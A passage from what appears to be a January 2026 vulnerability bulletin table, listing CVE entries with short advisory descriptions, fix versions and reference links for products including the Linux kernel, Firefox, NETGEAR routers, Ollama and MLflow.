https://git.kernel.org/stable/c/a317f63255ebc3dac378c79c5bff4f8d0561c290 https://git.kernel.org/stable/c/cf33f0b7df13685234ccea7be7bfe316b60db4db |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: mptcp: ensure context reset on disconnect() After the blamed commit below, if the MPC subflow is already in TCP_CLOSE status or has fallback to TCP at mptcp_disconnect() time, mptcp_do_fastclose() skips setting the `send_fastclose flag` and the later __mptcp_close_ssk() does not reset anymore the related subflow context. Any later connection will be created with both the `request_mptcp` flag and the msk-level fallback status off (it is unconditionally cleared at MPTCP disconnect time), leading to a warning in subflow_data_ready(): WARNING: CPU: 26 PID: 8996 at net/mptcp/subflow.c:1519 subflow_data_ready (net/mptcp/subflow.c:1519 (discriminator 13)) Modules linked in: CPU: 26 UID: 0 PID: 8996 Comm: syz.22.39 Not tainted 6.18.0-rc7-05427-g11fc074f6c36 #1 PREEMPT(voluntary) Hardware name: Bochs Bochs, BIOS Bochs 01/01/2011 RIP: 0010:subflow_data_ready (net/mptcp/subflow.c:1519 (discriminator 13)) Code: 90 0f 0b 90 90 e9 04 fe ff ff e8 b7 1e f5 fe 89 ee bf 07 00 00 00 e8 db 19 f5 fe 83 fd 07 0f 84 35 ff ff ff e8 9d 1e f5 fe 90 <0f> 0b 90 e9 27 ff ff ff e8 8f 1e f5 fe 4c 89 e7 48 89 de e8 14 09 RSP: 0018:ffffc9002646fb30 EFLAGS: 00010293 RAX: 0000000000000000 RBX: ffff88813b218000 RCX: ffffffff825c8435 RDX: ffff8881300b3580 RSI: ffffffff825c8443 RDI: 0000000000000005 RBP: 000000000000000b R08: ffffffff825c8435 R09: 000000000000000b R10: 0000000000000005 R11: 0000000000000007 R12: ffff888131ac0000 R13: 0000000000000000 R14: 0000000000000000 R15: 0000000000000000 FS: 00007f88330af6c0(0000) GS:ffff888a93dd2000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 00007f88330aefe8 CR3: 000000010ff59000 CR4: 0000000000350ef0 Call Trace: <TASK> tcp_data_ready (net/ipv4/tcp_input.c:5356) tcp_data_queue (net/ipv4/tcp_input.c:5445) tcp_rcv_state_process (net/ipv4/tcp_input.c:7165) tcp_v4_do_rcv (net/ipv4/tcp_ipv4.c:1955) __release_sock (include/net/sock.h:1158 (discriminator 6) net/core/sock.c:3180 (discriminator 6)) release_sock (net/core/sock.c:3737) mptcp_sendmsg (net/mptcp/protocol.c:1763 net/mptcp/protocol.c:1857) inet_sendmsg (net/ipv4/af_inet.c:853 (discriminator 7)) __sys_sendto (net/socket.c:727 (discriminator 15) net/socket.c:742 (discriminator 15) net/socket.c:2244 (discriminator 15)) __x64_sys_sendto (net/socket.c:2247) do_syscall_64 (arch/x86/entry/syscall_64.c:63 (discriminator 1) arch/x86/entry/syscall_64.c:94 (discriminator 1)) entry_SYSCALL_64_after_hwframe (arch/x86/entry/entry_64.S:130) RIP: 0033:0x7f883326702d Address the issue setting an explicit `fastclosing` flag at fastclose time, and checking such flag after mptcp_do_fastclose(). | 2026-01-14 | not yet calculated | CVE-2025-71144 | https://git.kernel.org/stable/c/5c7c7135468f3fc6379cde9777a2c18bfe92d82f https://git.kernel.org/stable/c/1c7c3a9314d8a7fc0e9a508606466a967c8e774a https://git.kernel.org/stable/c/f1a77dfc3b045c3dd5f6e64189b9f52b90399f07 https://git.kernel.org/stable/c/86730ac255b0497a272704de9a1df559f5d6602e |
| Ludashi--Ludashi | A local information disclosure vulnerability exists in the Ludashi driver before 5.1025 due to a lack of access control in the IOCTL handler. This driver exposes a device interface accessible to a normal user and handles attacker-controlled structures containing the lower 4GB of physical addresses. The handler maps arbitrary physical memory via MmMapIoSpace and copies data back to user mode without verifying the caller's privileges or the target address range. This allows unprivileged users to read arbitrary physical memory, potentially exposing kernel data structures, kernel pointers, security tokens, and other sensitive information. This vulnerability can be further exploited to bypass the Kernel Address Space Layout Rules (KASLR) and achieve local privilege escalation. | 2026-01-15 | not yet calculated | CVE-2025-67246 | http://ludashi.com https://github.com/CDipper/CVE-Publication |
| LycheeOrg--Lychee | Lychee is a free, open-source photo-management tool. Prior to 7.1.0, an authorization vulnerability exists in Lychee's album password unlock functionality that allows users to gain possibly unauthorized access to other users' password-protected albums. When a user unlocks a password-protected public album, the system automatically unlocks ALL other public albums that share the same password, resulting in a complete authorization bypass. This vulnerability is fixed in 7.1.0. | 2026-01-12 | not yet calculated | CVE-2026-22784 | https://github.com/LycheeOrg/Lychee/security/advisories/GHSA-jj56-2c54-4f25 https://github.com/LycheeOrg/Lychee/commit/f021a29f9ab2bafa81d9f5e32ff5bc89915c7d41 |
| maximmasiutin--TinyWeb | TinyWeb is a web server (HTTP, HTTPS) written in Delphi for Win32. TinyWeb HTTP Server before version 1.98 is vulnerable to OS command injection via CGI ISINDEX-style query parameters. The query parameters are passed as command-line arguments to the CGI executable via Windows CreateProcess(). An unauthenticated remote attacker can execute arbitrary commands on the server by injecting Windows shell metacharacters into HTTP requests. This vulnerability is fixed in 1.98. | 2026-01-12 | not yet calculated | CVE-2026-22781 | https://github.com/maximmasiutin/TinyWeb/security/advisories/GHSA-m779-84h5-72q2 https://github.com/maximmasiutin/TinyWeb/commit/876b7e2887f4ea5be3e18bb2af7313f23a283c96 https://www.masiutin.net/tinyweb-cve-2025-cgi-command-injection.html |
| MCP Server--Zen | A path traversal vulnerability exists in Zen MCP Server before 9.8.2 that allows authenticated attackers to read arbitrary files on the system. The vulnerability is caused by flawed logic in the is_dangerous_path() validation function that uses exact string matching against a blacklist of system directories. Attackers can bypass these restrictions by accessing subdirectories of blacklisted paths. | 2026-01-12 | not yet calculated | CVE-2025-66689 | https://github.com/BeehiveInnovations/zen-mcp-server/issues/293 https://github.com/Team-Off-course/MCP-Server-Vuln-Analysis/blob/main/CVE-2025-66689.md |
| metabase--metabase | Metabase is an open-source data analytics platform. Prior to 55.13, 56.3, and 57.1, self-hosted Metabase instances that allow users to create subscriptions could be potentially impacted if their Metabase is colocated with other unsecured resources. This vulnerability is fixed in 55.13, 56.3, and 57.1. | 2026-01-12 | not yet calculated | CVE-2026-22805 | https://github.com/metabase/metabase/security/advisories/GHSA-2wgg-7r2p-cmqx |
| Microsoft--Microsoft Edge (Chromium-based) | Microsoft Edge Elevation Service exposes a privileged COM interface that inadequately validates the privileges of the calling process. A standard (non‑administrator) local user can invoke the IElevatorEdge interface method LaunchUpdateCmdElevatedAndWait, causing the service to execute privileged update commands as LocalSystem. This allows a non‑administrator to enable or disable Windows Virtualization‑Based Security (VBS) by modifying protected system registry keys under HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard. Disabling VBS weakens critical platform protections such as Credential Guard, Hypervisor‑protected Code Integrity (HVCI), and the Secure Kernel, resulting in a security feature bypass. | 2026-01-16 | not yet calculated | CVE-2026-21223 | Microsoft Edge (Chromium-based) Security Feature Bypass Vulnerability |
| Mini Router--Italy Wireless | A Stored Cross-Site Scripting (XSS) vulnerability in Web management interface in Each Italy Wireless Mini Router WIRELESS-N 300M v28K.MiniRouter.20190211 allows attackers to execute arbitrary scripts via a crafted payload due to unsanitized repeater AP SSID value when is displayed in any page at /index.htm. | 2026-01-15 | not yet calculated | CVE-2025-65349 | https://imgur.com/a/X9DNOBj https://github.com/5ulfur/security-advisories/tree/main/CVE-2025-65349 |
| Mitel MiVoice--Mitel MiVoice | A vulnerability in the Provisioning Manager component of Mitel MiVoice MX-ONE 7.3 (7.3.0.0.50) through 7.8 SP1 (7.8.1.0.14) could allow an unauthenticated attacker to conduct an authentication bypass attack due to improper authentication mechanisms. A successful exploit could allow an attacker to gain unauthorized access to user or admin accounts in the system. | 2026-01-15 | not yet calculated | CVE-2025-67822 | https://www.mitel.com/support/security-advisories https://www.mitel.com/support/security-advisories/mitel-product-security-advisory-misa-2025-0009 |
| Mitel--Mitel | A vulnerability in the Multimedia Email component of Mitel MiContact Center Business through 10.2.0.10 and Mitel CX through 1.1.0.1 could allow an unauthenticated attacker to conduct a Cross-Site Scripting (XSS) attack due to insufficient input validation. A successful exploit requires user interaction where the email channel is enabled. This could allow an attacker to execute arbitrary scripts in the victim's browser or desktop client application. | 2026-01-15 | not yet calculated | CVE-2025-67823 | https://www.mitel.com/support/security-advisories https://www.mitel.com/support/security-advisories/mitel-product-security-advisory-misa-2025-0010 |
| mlflow--mlflow/mlflow | MLFlow versions up to and including 3.4.0 are vulnerable to DNS rebinding attacks due to a lack of Origin header validation in the MLFlow REST server. This vulnerability allows malicious websites to bypass Same-Origin Policy protections and execute unauthorized calls against REST endpoints. An attacker can query, update, and delete experiments via the affected endpoints, leading to potential data exfiltration, destruction, or manipulation. The issue is resolved in version 3.5.0. | 2026-01-12 | not yet calculated | CVE-2025-14279 | https://huntr.com/bounties/ef478f72-2e4f-44dc-8055-fc06bef03108 https://github.com/mlflow/mlflow/commit/b0ffd289e9b0d0cc32c9e3a9b9f3843ae83dbec3 |
| Mozilla--Firefox | Mitigation bypass in the DOM: Security component. This vulnerability affects Firefox < 147, Firefox ESR < 115.32, Firefox ESR < 140.7, Thunderbird < 147, and Thunderbird < 140.7. | 2026-01-13 | not yet calculated | CVE-2026-0877 | https://bugzilla.mozilla.org/show_bug.cgi?id=1999257 https://www.mozilla.org/security/advisories/mfsa2026-01/ https://www.mozilla.org/security/advisories/mfsa2026-02/ https://www.mozilla.org/security/advisories/mfsa2026-03/ https://www.mozilla.org/security/advisories/mfsa2026-04/ https://www.mozilla.org/security/advisories/mfsa2026-05/ |
| Mozilla--Firefox | Sandbox escape due to incorrect boundary conditions in the Graphics: CanvasWebGL component. This vulnerability affects Firefox < 147, Firefox ESR < 140.7, Thunderbird < 147, and Thunderbird < 140.7. | 2026-01-13 | not yet calculated | CVE-2026-0878 | https://bugzilla.mozilla.org/show_bug.cgi?id=2003989 https://www.mozilla.org/security/advisories/mfsa2026-01/ https://www.mozilla.org/security/advisories/mfsa2026-03/ https://www.mozilla.org/security/advisories/mfsa2026-04/ https://www.mozilla.org/security/advisories/mfsa2026-05/ |
| Mozilla--Firefox | Sandbox escape due to incorrect boundary conditions in the Graphics component. This vulnerability affects Firefox < 147, Firefox ESR < 115.32, Firefox ESR < 140.7, Thunderbird < 147, and Thunderbird < 140.7. | 2026-01-13 | not yet calculated | CVE-2026-0879 | https://bugzilla.mozilla.org/show_bug.cgi?id=2004602 https://www.mozilla.org/security/advisories/mfsa2026-01/ https://www.mozilla.org/security/advisories/mfsa2026-02/ https://www.mozilla.org/security/advisories/mfsa2026-03/ https://www.mozilla.org/security/advisories/mfsa2026-04/ https://www.mozilla.org/security/advisories/mfsa2026-05/ |
| Mozilla--Firefox | Sandbox escape due to integer overflow in the Graphics component. This vulnerability affects Firefox < 147, Firefox ESR < 115.32, Firefox ESR < 140.7, Thunderbird < 147, and Thunderbird < 140.7. | 2026-01-13 | not yet calculated | CVE-2026-0880 | https://bugzilla.mozilla.org/show_bug.cgi?id=2005014 https://www.mozilla.org/security/advisories/mfsa2026-01/ https://www.mozilla.org/security/advisories/mfsa2026-02/ https://www.mozilla.org/security/advisories/mfsa2026-03/ https://www.mozilla.org/security/advisories/mfsa2026-04/ https://www.mozilla.org/security/advisories/mfsa2026-05/ |
| Mozilla--Firefox | Sandbox escape in the Messaging System component. This vulnerability affects Firefox < 147 and Thunderbird < 147. | 2026-01-13 | not yet calculated | CVE-2026-0881 | https://bugzilla.mozilla.org/show_bug.cgi?id=2005845 https://www.mozilla.org/security/advisories/mfsa2026-01/ https://www.mozilla.org/security/advisories/mfsa2026-04/ |
| Mozilla--Firefox | Use-after-free in the IPC component. This vulnerability affects Firefox < 147, Firefox ESR < 115.32, Firefox ESR < 140.7, Thunderbird < 147, and Thunderbird < 140.7. | 2026-01-13 | not yet calculated | CVE-2026-0882 | https://bugzilla.mozilla.org/show_bug.cgi?id=1924125 https://www.mozilla.org/security/advisories/mfsa2026-01/ https://www.mozilla.org/security/advisories/mfsa2026-02/ https://www.mozilla.org/security/advisories/mfsa2026-03/ https://www.mozilla.org/security/advisories/mfsa2026-04/ https://www.mozilla.org/security/advisories/mfsa2026-05/ |
| Mozilla--Firefox | Information disclosure in the Networking component. This vulnerability affects Firefox < 147, Firefox ESR < 140.7, Thunderbird < 147, and Thunderbird < 140.7. | 2026-01-13 | not yet calculated | CVE-2026-0883 | https://bugzilla.mozilla.org/show_bug.cgi?id=1989340 https://www.mozilla.org/security/advisories/mfsa2026-01/ https://www.mozilla.org/security/advisories/mfsa2026-03/ https://www.mozilla.org/security/advisories/mfsa2026-04/ https://www.mozilla.org/security/advisories/mfsa2026-05/ |
| Mozilla--Firefox | Use-after-free in the JavaScript Engine component. This vulnerability affects Firefox < 147, Firefox ESR < 140.7, Thunderbird < 147, and Thunderbird < 140.7. | 2026-01-13 | not yet calculated | CVE-2026-0884 | https://bugzilla.mozilla.org/show_bug.cgi?id=2003588 https://www.mozilla.org/security/advisories/mfsa2026-01/ https://www.mozilla.org/security/advisories/mfsa2026-03/ https://www.mozilla.org/security/advisories/mfsa2026-04/ https://www.mozilla.org/security/advisories/mfsa2026-05/ |
| Mozilla--Firefox | Use-after-free in the JavaScript: GC component. This vulnerability affects Firefox < 147, Firefox ESR < 140.7, Thunderbird < 147, and Thunderbird < 140.7. | 2026-01-13 | not yet calculated | CVE-2026-0885 | https://bugzilla.mozilla.org/show_bug.cgi?id=2003607 https://www.mozilla.org/security/advisories/mfsa2026-01/ https://www.mozilla.org/security/advisories/mfsa2026-03/ https://www.mozilla.org/security/advisories/mfsa2026-04/ https://www.mozilla.org/security/advisories/mfsa2026-05/ |
| Mozilla--Firefox | Incorrect boundary conditions in the Graphics component. This vulnerability affects Firefox < 147, Firefox ESR < 115.32, Firefox ESR < 140.7, Thunderbird < 147, and Thunderbird < 140.7. | 2026-01-13 | not yet calculated | CVE-2026-0886 | https://bugzilla.mozilla.org/show_bug.cgi?id=2005658 https://www.mozilla.org/security/advisories/mfsa2026-01/ https://www.mozilla.org/security/advisories/mfsa2026-02/ https://www.mozilla.org/security/advisories/mfsa2026-03/ https://www.mozilla.org/security/advisories/mfsa2026-04/ https://www.mozilla.org/security/advisories/mfsa2026-05/ |
| Mozilla--Firefox | Clickjacking issue, information disclosure in the PDF Viewer component. This vulnerability affects Firefox < 147, Firefox ESR < 140.7, Thunderbird < 147, and Thunderbird < 140.7. | 2026-01-13 | not yet calculated | CVE-2026-0887 | https://bugzilla.mozilla.org/show_bug.cgi?id=2006500 https://www.mozilla.org/security/advisories/mfsa2026-01/ https://www.mozilla.org/security/advisories/mfsa2026-03/ https://www.mozilla.org/security/advisories/mfsa2026-04/ https://www.mozilla.org/security/advisories/mfsa2026-05/ |
| Mozilla--Firefox | Information disclosure in the XML component. This vulnerability affects Firefox < 147 and Thunderbird < 147. | 2026-01-13 | not yet calculated | CVE-2026-0888 | https://bugzilla.mozilla.org/show_bug.cgi?id=1985996 https://www.mozilla.org/security/advisories/mfsa2026-01/ https://www.mozilla.org/security/advisories/mfsa2026-04/ |
| Mozilla--Firefox | Denial-of-service in the DOM: Service Workers component. This vulnerability affects Firefox < 147 and Thunderbird < 147. | 2026-01-13 | not yet calculated | CVE-2026-0889 | https://bugzilla.mozilla.org/show_bug.cgi?id=1999084 https://www.mozilla.org/security/advisories/mfsa2026-01/ https://www.mozilla.org/security/advisories/mfsa2026-04/ |
| Mozilla--Firefox | Spoofing issue in the DOM: Copy & Paste and Drag & Drop component. This vulnerability affects Firefox < 147, Firefox ESR < 140.7, Thunderbird < 147, and Thunderbird < 140.7. | 2026-01-13 | not yet calculated | CVE-2026-0890 | https://bugzilla.mozilla.org/show_bug.cgi?id=2005081 https://www.mozilla.org/security/advisories/mfsa2026-01/ https://www.mozilla.org/security/advisories/mfsa2026-03/ https://www.mozilla.org/security/advisories/mfsa2026-04/ https://www.mozilla.org/security/advisories/mfsa2026-05/ |
| Mozilla--Firefox | Memory safety bugs present in Firefox ESR 140.6, Thunderbird ESR 140.6, Firefox 146 and Thunderbird 146. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code. This vulnerability affects Firefox < 147, Firefox ESR < 140.7, Thunderbird < 147, and Thunderbird < 140.7. | 2026-01-13 | not yet calculated | CVE-2026-0891 | Memory safety bugs fixed in Firefox ESR 140.7, Thunderbird ESR 140.7, Firefox 147 and Thunderbird 147 https://www.mozilla.org/security/advisories/mfsa2026-01/ https://www.mozilla.org/security/advisories/mfsa2026-03/ https://www.mozilla.org/security/advisories/mfsa2026-04/ https://www.mozilla.org/security/advisories/mfsa2026-05/ |
| Mozilla--Firefox | Memory safety bugs present in Firefox 146 and Thunderbird 146. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code. This vulnerability affects Firefox < 147 and Thunderbird < 147. | 2026-01-13 | not yet calculated | CVE-2026-0892 | Memory safety bugs fixed in Firefox 147 and Thunderbird 147 https://www.mozilla.org/security/advisories/mfsa2026-01/ https://www.mozilla.org/security/advisories/mfsa2026-04/ |
| nanomq--nanomq | An issue in nanomq v0.22.7 allows attackers to cause a Denial of Service (DoS) via a crafted request. The number of data packets received in the recv-q queue of the Nanomq process continues to increase, causing the nanomq broker to fall into a deadlock and be unable to provide normal services. | 2026-01-15 | not yet calculated | CVE-2024-48077 | https://github.com/nanomq/nanomq https://gist.github.com/pengwGit/2379e7a8fe75d09621f7c060db0237c4 |
| NAVER--lucy-xss-filter | lucy-xss-filter before commit 7c1de6d allows an attacker to induce server-side HEAD requests to arbitrary URLs when the ObjectSecurityListener or EmbedSecurityListener option is enabled and embed or object tags are used with a src attribute missing a file extension. | 2026-01-16 | not yet calculated | CVE-2026-23768 | https://cve.naver.com/detail/cve-2026-23768.html https://github.com/naver/lucy-xss-filter/pull/31 |
| NAVER--lucy-xss-filter | lucy-xss-filter before commit e5826c0 allows an attacker to execute malicious JavaScript due to improper sanitization caused by misconfigured default superset rule files. | 2026-01-16 | not yet calculated | CVE-2026-23769 | https://cve.naver.com/detail/cve-2026-23769.html https://github.com/naver/lucy-xss-filter/pull/32 |
| Neoteroi--BlackSheep | BlackSheep is an asynchronous web framework to build event based web applications with Python. Prior to 2.4.6, the HTTP Client implementation in BlackSheep is vulnerable to CRLF injection. Missing headers validation makes it possible for an attacker to modify the HTTP requests (e.g. insert a new header) or even create a new HTTP request. Exploitation requires developers to pass unsanitized user input directly into headers.The server part is not affected because BlackSheep delegates to an underlying ASGI server handling of response headers. This vulnerability is fixed in 2.4.6. | 2026-01-14 | not yet calculated | CVE-2026-22779 | https://github.com/Neoteroi/BlackSheep/security/advisories/GHSA-6pw3-h7xf-x4gp https://github.com/Neoteroi/BlackSheep/commit/bd4ecb9542b5d52442276b5a6907931b90f38d12 https://github.com/Neoteroi/BlackSheep/releases/tag/v2.4.6 |
| NETAPP--ONTAP 9 | ONTAP versions 9.16.1 prior to 9.16.1P9 and 9.17.1 prior to 9.17.1P2 with snapshot locking enabled are susceptible to a vulnerability which could allow a privileged remote attacker to set the snapshot expiry time to none. | 2026-01-12 | not yet calculated | CVE-2026-22050 | https://security.netapp.com/advisory/NTAP-20260112-0001 |
| NETGEAR--EX5000 | An insufficient authentication vulnerability in NETGEAR WiFi range extenders allows a network adjacent attacker with WiFi authentication or a physical Ethernet port connection to bypass the authentication process and access the admin panel. | 2026-01-13 | not yet calculated | CVE-2026-0407 | https://www.netgear.com/support/product/ex5000 https://www.netgear.com/support/product/ex3110 https://www.netgear.com/support/product/ex6110 https://www.netgear.com/support/product/ex2800 https://kb.netgear.com/000070442/January-2026-NETGEAR-Security-Advisory |
| NETGEAR--EX5000 | A path traversal vulnerability in NETGEAR WiFi range extenders allows an attacker with LAN authentication to access the router's IP and review the contents of the dynamically generated webproc file, which records the username and password submitted to the router GUI. | 2026-01-13 | not yet calculated | CVE-2026-0408 | https://www.netgear.com/support/product/ex5000 https://www.netgear.com/support/product/ex3110 https://www.netgear.com/support/product/ex6110 https://www.netgear.com/support/product/ex2800 https://kb.netgear.com/000070442/January-2026-NETGEAR-Security-Advisory |
| NETGEAR--RBE970 | An authentication bypass vulnerability in NETGEAR Orbi devices allows users connected to the local network to access the router web interface as an admin. | 2026-01-13 | not yet calculated | CVE-2026-0405 | https://www.netgear.com/support/product/rbe971 https://www.netgear.com/support/product/rbe970 https://www.netgear.com/support/product/cbr750 https://www.netgear.com/support/product/nbr750 https://www.netgear.com/support/product/rbe770 https://www.netgear.com/support/product/rbe771 https://www.netgear.com/support/product/rbe772 https://www.netgear.com/support/product/rbe773 https://www.netgear.com/support/product/rbr750 https://www.netgear.com/support/product/rbs750 https://www.netgear.com/support/product/rbr840 https://www.netgear.com/support/product/rbs840 https://www.netgear.com/support/product/rbr850 https://www.netgear.com/support/product/rbs850 https://www.netgear.com/support/product/rbr860 https://www.netgear.com/support/product/rbs860 https://www.netgear.com/support/product/rbre950 https://www.netgear.com/support/product/rbse950 https://www.netgear.com/support/product/rbre960 https://www.netgear.com/support/product/rbse960 https://www.netgear.com/support/product/rbe370 https://www.netgear.com/support/product/rbe371 https://www.netgear.com/support/product/rbe372 https://www.netgear.com/support/product/rbe373 https://www.netgear.com/support/product/rbe374 https://kb.netgear.com/000070442/January-2026-NETGEAR-Security-Advisory |
| NETGEAR--RBR750 | An insufficient input validation vulnerability in NETGEAR Orbi routers allows attackers connected to the router's LAN to execute OS command injections. | 2026-01-13 | not yet calculated | CVE-2026-0403 | https://www.netgear.com/support/product/rbr750 https://www.netgear.com/support/product/rbs750 https://www.netgear.com/support/product/rbre960 https://www.netgear.com/support/product/rbse960 https://www.netgear.com/support/product/rbr850 https://www.netgear.com/support/product/rbs850 https://www.netgear.com/support/product/rbe971 https://www.netgear.com/support/product/rbe970 https://www.netgear.com/support/product/rbr860 https://www.netgear.com/support/product/rbs860 https://kb.netgear.com/000070442/January-2026-NETGEAR-Security-Advisory |
| NETGEAR--RBRE960 | An insufficient input validation vulnerability in NETGEAR Orbi devices' DHCPv6 functionality allows network adjacent attackers authenticated over WiFi or on LAN to execute OS command injections on the router. DHCPv6 is not enabled by default. | 2026-01-13 | not yet calculated | CVE-2026-0404 | https://www.netgear.com/support/product/rbre960 https://www.netgear.com/support/product/rbse960 https://www.netgear.com/support/product/rbr850 https://www.netgear.com/support/product/rbs850 https://www.netgear.com/support/product/rbr860 https://www.netgear.com/support/product/rbs860 https://www.netgear.com/support/product/rbre950 https://www.netgear.com/support/product/rbse950 https://www.netgear.com/support/product/rbr750 https://www.netgear.com/support/product/rbs750 https://www.netgear.com/support/product/rbr840 https://www.netgear.com/support/product/rbs840 https://kb.netgear.com/000070442/January-2026-NETGEAR-Security-Advisory |
| NETGEAR--XR1000v2 | An insufficient input validation vulnerability in the NETGEAR XR1000v2 allows attackers connected to the router's LAN to execute OS command injections. | 2026-01-13 | not yet calculated | CVE-2026-0406 | https://www.netgear.com/support/product/xr1000v2 https://kb.netgear.com/000070442/January-2026-NETGEAR-Security-Advisory |
| Ollama--Ollama | Ollama 0.11.5-rc0 through current version 0.13.5 contain a null pointer dereference vulnerability in the multi-modal model image processing functionality. When processing base64-encoded image data via the /api/chat endpoint, the application fails to validate that the decoded data represents valid media before passing it to the mtmd_helper_bitmap_init_from_buf function. This function can return NULL for malformed input, but the code does not check this return value before dereferencing the pointer in subsequent operations. A remote attacker can exploit this by sending specially crafted base64 image data that decodes to invalid media, causing a segmentation fault and crashing the runner process. This results in a denial of service condition where the model becomes unavailable to all users until the service is restarted. | 2026-01-12 | not yet calculated | CVE-2025-15514 | https://huntr.com/bounties/172df98b-07cd-41ea-a628-366f8cd525c0 https://ollama.com/ https://https://github.com/ollama/ollama https://www.vulncheck.com/advisories/ollama-multi-modal-image-processing-null-pointer-dereference |
| Omnilogic--Omni Secure Files | Omni Secure Files plugin versions prior to 0.1.14 contain an arbitrary file upload vulnerability in the bundled plupload example endpoint. The /wp-content/plugins/omni-secure-files/plupload/examples/upload.php handler allows unauthenticated uploads without enforcing safe file type restrictions, enabling an attacker to place attacker-controlled files under the plugin's uploads directory. This can lead to remote code execution if a server-executable file type is uploaded and subsequently accessed. | 2026-01-16 | not yet calculated | CVE-2012-10064 | https://wpscan.com/vulnerability/376fd666-6471-479c-9b74-1d8088a33e89/ https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/omni-secure-files/omni-secure-files-0113-arbitrary-file-upload https://wordpress.org/plugins/omni-secure-files/ https://www.acunetix.com/vulnerabilities/web/wordpress-plugin-omni-secure-files-upload-php-arbitrary-file-upload-0-1-13/ https://web.archive.org/web/20121025112632/http%3A//secunia.com/advisories/49441 https://packetstorm.news/files/id/113411 https://www.exploit-db.com/exploits/19009 https://web.archive.org/web/20191021091221/https%3A//www.securityfocus.com/bid/53872/ https://www.vulncheck.com/advisories/omni-secure-files-unauthenticated-arbitrary-file-upload |
| Omnispace--Omnispace | Directory traversal vulnerability in Omnispace Agora Project before 25.10 allowing unauthenticated attackers to read files on the system via the misc controller and the ExternalGetFile action. Only files with an extension can be read. | 2026-01-15 | not yet calculated | CVE-2025-67076 | https://www.agora-project.net https://www.helx.io/blog/advisory-agora-project/ |
| Omnispace--Omnispace | File upload vulnerability in Omnispace Agora Project before 25.10 allowing authenticated, or under certain conditions also guest users, via the UploadTmpFile action. | 2026-01-15 | not yet calculated | CVE-2025-67077 | https://www.agora-project.net https://www.helx.io/blog/advisory-agora-project/ |
| Omnispace--Omnispace | Cross site scripting (XSS) vulnerability in Omnispace Agora Project before 25.10 allowing attackers to execute arbitrary code via the notify parameter of the file controller used to display errors. | 2026-01-15 | not yet calculated | CVE-2025-67078 | https://www.agora-project.net https://www.helx.io/blog/advisory-agora-project/ |
| Omnispace--Omnispace | File upload vulnerability in Omnispace Agora Project before 25.10 allowing attackers to execute code through the MSL engine of the Imagick library via crafted PDF file to the file upload and thumbnail functions. | 2026-01-15 | not yet calculated | CVE-2025-67079 | https://www.agora-project.net https://www.helx.io/blog/advisory-agora-project/ |
| orval-labs--orval | orval generates type-safe JS clients (TypeScript) from any valid OpenAPI v3 or Swagger v2 specification. Prior to 7.18.0, the MCP server generation logic relies on string manipulation that incorporates the summary field from the OpenAPI specification without proper validation or escaping. This allows an attacker to "break out" of the string literal and inject arbitrary code. This vulnerability is fixed in 7.18.0. | 2026-01-12 | not yet calculated | CVE-2026-22785 | https://github.com/orval-labs/orval/security/advisories/GHSA-mwr6-3gp8-9jmj https://github.com/orval-labs/orval/commit/80b5fe73b94f120a3a5561952d6d4b0f8d7e928d |
| Paessler--Paessler | Paessler PRTG Network Monitor before 25.4.114 allows XSS by an unauthenticated attacker via the tag parameter. | 2026-01-14 | not yet calculated | CVE-2025-67833 | https://paessler.com https://helpdesk.paessler.com/en/support/solutions/articles/76000087289-vulnerabilities-in-prtg-prior-v25-4-114-1032 |
| Paessler--Paessler | Paessler PRTG Network Monitor before 25.4.114 allows XSS by an unauthenticated attacker via the filter parameter. | 2026-01-14 | not yet calculated | CVE-2025-67834 | https://paessler.com https://helpdesk.paessler.com/en/support/solutions/articles/76000087289-vulnerabilities-in-prtg-prior-v25-4-114-1032 |
| Paessler--Paessler | Paessler PRTG Network Monitor before 25.4.114 allows Denial-of-Service (DoS) by an authenticated attacker via the Notification Contacts functionality. | 2026-01-14 | not yet calculated | CVE-2025-67835 | https://paessler.com https://helpdesk.paessler.com/en/support/solutions/articles/76000087289-vulnerabilities-in-prtg-prior-v25-4-114-1032 |
| Palo Alto Networks--Cloud NGFW | A vulnerability in Palo Alto Networks PAN-OS software enables an unauthenticated attacker to cause a denial of service (DoS) to the firewall. Repeated attempts to trigger this issue results in the firewall entering into maintenance mode. | 2026-01-15 | not yet calculated | CVE-2026-0227 | https://security.paloaltonetworks.com/CVE-2025-4620 |
| Pegasystems--Pega Infinity | Pega Customer Service Framework versions 8.7.0 through 25.1.0 are affected by a Unrestricted file upload vulnerability, where a privileged user could potentially upload a malicious file. | 2026-01-13 | not yet calculated | CVE-2025-62182 | https://support.pega.com/support-doc/pega-security-advisory-l25-vulnerability-remediation-note |
| pH7Software--pH7Software | A stored cross-site scripting (XSS) vulnerability exists in pH7Software pH7-Social-Dating-CMS 17.9.1 in the user profile Description field. | 2026-01-14 | not yet calculated | CVE-2025-63644 | https://drive.google.com/drive/folders/1mYDvUTnlTPCGTB-7tHD3pmu_wHtlMVRP https://medium.com/@rudranshsinghrajpurohit/cve-2025-63644-stored-cross-site-scripting-xss-vulnerability-in-ph7-social-dating-cms-23ed0e7eb853 |
| phpgurukul--phpgurukul | phpgurukul News Portal Project V4.1 has an Arbitrary File Deletion Vulnerability in remove_file.php. The parameter file can cause any file to be deleted. | 2026-01-13 | not yet calculated | CVE-2025-69990 | https://github.com/Y4y17/CVE/blob/main/News%20Portal%20Project/File%20deletion%20vulnerability.md |
| phpgurukul--phpgurukul | phpgurukul News Portal Project V4.1 is vulnerable to SQL Injection in check_availablity.php. | 2026-01-13 | not yet calculated | CVE-2025-69991 | https://github.com/Y4y17/CVE/blob/main/News%20Portal%20Project/SQL%20Injection.md |
| phpgurukul--phpgurukul | phpgurukul News Portal Project V4.1 has File Upload Vulnerability via upload.php, which enables the upload of files of any format to the server without identity authentication. | 2026-01-13 | not yet calculated | CVE-2025-69992 | https://github.com/Y4y17/CVE/blob/main/News%20Portal%20Project/File%20upload%20vulnerability.md |
| QloApps--QloApps | A CSRF issue in index.php in QloApps hotel eCommerce 1.5.1 allows an attacker to change the admin's email address via a crafted HTML document. | 2026-01-12 | not yet calculated | CVE-2021-41074 | https://qloapps.com/ https://github.com/dillonkirsch/CVE-2021-41074 |
